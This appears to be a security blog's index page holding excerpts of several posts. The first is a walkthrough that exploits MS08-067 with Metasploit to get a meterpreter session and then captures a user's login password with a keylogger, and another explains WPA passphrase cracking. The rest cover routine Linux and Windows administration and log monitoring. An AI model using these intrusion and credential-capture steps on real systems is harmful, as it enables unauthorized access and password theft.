So you got a meterpreter session on a remote client, and now you want to get password hashes; but sometimes you can’t use “hashdump” from meterpreter, specially if your session is not running as user with admin privileges. So how could you get the remote user password? Well, Metasploit has a script called “keylogrecorder,” which has an option to logoff the user, and record his login password. Note that for this to work, you need to migrate your process to “winlogon.exe.”
STEPS:
1- Ok, the first thing is to get a meterpreter session going. For this we’ll use a “netapi” exploit.

msf > search netapi
[*] Searching loaded modules for pattern 'netapi'...
 
Exploits
========
 
   Name                         Rank    Description
   ----                         ----    -----------
   windows/smb/ms03_049_netapi  good    Microsoft Workstation Service NetAddAlternateComputerName Overflow
   windows/smb/ms06_040_netapi  great   Microsoft Server Service NetpwPathCanonicalize Overflow
   windows/smb/ms06_070_wkssvc  normal  Microsoft Workstation Service NetpManageIPCConnect Overflow
   windows/smb/ms08_067_netapi  great   Microsoft Server Service Relative Path Stack Corruption
 
msf> use exploit/windows/smb/ms08_067_netapi

2- now we need to set the options for this exploit.

msf exploit(ms08_067_netapi)> show options
 
Module options:
 
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
 
Exploit target:
 
   Id  Name
   --  ----
   0   Automatic Targeting
 
msf exploit(ms08_067_netapi)> set RHOST 172.16.10.105
RHOST => 172.16.10.105

Read the rest of this entry »

Ok, the previous video was kind of out dated, so I posted a new one. Credits to g0tmi1k. This video goes beyond just cracking wpa, it also shows how the different tools perform. This video explains the methodology really simple. Let me say that cracking WPA is not like cracking WEP, in WEP you’re exploiting a vulnerability in the way the encryption algorithm is implemented, but in WPA the only vulnerability will be in the strength of the user passphrase. Yes you’ve guessed it, when cracking WPA basically what you’re doing is brute-forcing the user password, in other words the success of your attack will depend on your dictionary or password list. If the user’s passphrase is not in your dictionary, you will never crack the WPA key. There are several types of WPA dictionary list out there, but I highly recommend using rainbow-tables which can be several Gigs in size. How to find them?… Google is your friend! Read the rest of this entry »

If you’re like me that test pretty much any os and apps in some sort of virtual environment. In my case I use VMware Workstation, so when I decided to test Backtrack 4 final, I needed to install the vmware Tools, and here I go over the commands needed to install the vmware tools.

1- First go to VM->Install Vmware Tools (the figure shows as Reinstall VMware Tools because I had previously installed it) but yours should say “Install”

Read the rest of this entry »

After you have created users accounts, and let those users loose on your somputer, there are different commands you can use to keep track of how they are using your computer. There are commands for checking such things as who is logged into your system and getting general information about the users with accounts on your system. Here are some of these commands.
last #list the most recent successful logins

root@ubuntu-box:~# last -a
smbuser  pts/2        Fri Sep 25 06:37   still logged in    windows-box
jorge    pts/1        Fri Sep 25 06:35   still logged in    windows-box
jorge    pts/1        Fri Sep 25 06:34 - 06:35  (00:00)     windows-box
 
wtmp begins Fri Sep 25 06:34:52 2009

lastb #List the most recent unsuccessful logins

root@ubuntu-vbox:~# lastb
smbuser  ssh:notty    windows-box      Fri Sep 25 05:36 - 05:36  (00:00)
jorge    :0                            Fri Sep 18 17:28 - 17:28  (00:00)
jorge    :0                            Fri Sep 18 17:28 - 17:28  (00:00)
jorge    :0                            Fri Sep 18 17:27 - 17:27  (00:00)
jorge    :0                            Fri Sep 18 17:27 - 17:27  (00:00)
jorge    :0                            Fri Sep 18 17:27 - 17:27  (00:00)

who -u #List who is currently logged in (long form) Read the rest of this entry »

Windows Vista contains a handy hint mechanism for helping you recall you password if you’ve forgotten it. But what about if you’ve completely forgotten both your password and the interpretation of the hint. In that situation your work and email will be locked inside your computer (Well, ok, probably your administrator could recover it for you or reset your password). Fortunately, Windows Vista still offers a solution to this problem. Note that this only work before you actually forget your password; in other words, you have to make the disk while you still have access to your computer. In this case Vista will be saving your password to a usb disk or cd that you will insert in case you forget your password. Should I mention that you should put this key in a save place! Although the key is not stored in clear text inside your cd or usb key, it can be read by someone with some serious know-how.
To create this disk: Read the rest of this entry »

Some times you need to keep a close watch on a machine that has been compromise; therefore, you might want to see the logs in real time. Well, ”tail” allows you to watch the logs in real time. Most systems related messages are logged to the “messages” log file, and security related messages are send to the “secure” log file. In the later you can find successful and unsucesful login attemps. So the “secure” log file is a good place to start when you are trying to identify whether someone has tried to break in to that box.

tail -f /var/log/secure

or

tail -f /var/log/messages

Now you can try login from a remote box or locally and watch the logs scroll down in real time. These are some logs file that might be of interest.

tail -f /var/log/secure  #security related messages
tail -f /var/log/messages  #system messages
tail -f /var/log/maillog  #mail server messages
tail -f /var/log/httpd/access_log  #web server messages

Moreover, the “grep” command can be quite useful for parsing through logs files. In this case, the grep command is use to search the “secure” log file for the string “jorge.” The -R switch is to specify the string, and the -n switch for displaying the line number.

[root@Fedora11-vbox ~]# grep -Rn smbuser /var/log/secure
81:Sep 26 11:55:04 Fedora11-vbox useradd[2233]: new group: name=smbuser, GID=501
82:Sep 26 11:55:04 Fedora11-vbox useradd[2233]: new user: name=smbuser, UID=501, GID=501, home=/home/smbuser, shell=/bin/bash
83:Sep 26 11:55:26 Fedora11-vbox passwd: pam_unix(passwd:chauthtok): password changed for smbuser
85:Sep 26 12:00:37 Fedora11-vbox passwd: pam_unix(passwd:chauthtok): password changed for smbuser

The “grep” command can also be used to search multiple files recursively. This command searches in the “/etc/httpd/conf” and “/etc/httpd/conf.d” directories for the string “VirtualHost.” Read the rest of this entry »

VNC is considered to be an insecure protocol. The password is sent using fairly weak encryption, and the rest of the session is not encrypted at all. For that reason, when using VNC over an untrusted network or internet, I recommend you tunnel it over SSH.

To forward VNC port 5900 on localhost to remote host port 5900

ssh -L 5900:localhost:5900 vncserver

If your ssh server is listening on other port like: 222

ssh -L 5900:localhost:5900 vncserver -p 222

The same procedure can be done on a window$ machine using putty Read the rest of this entry »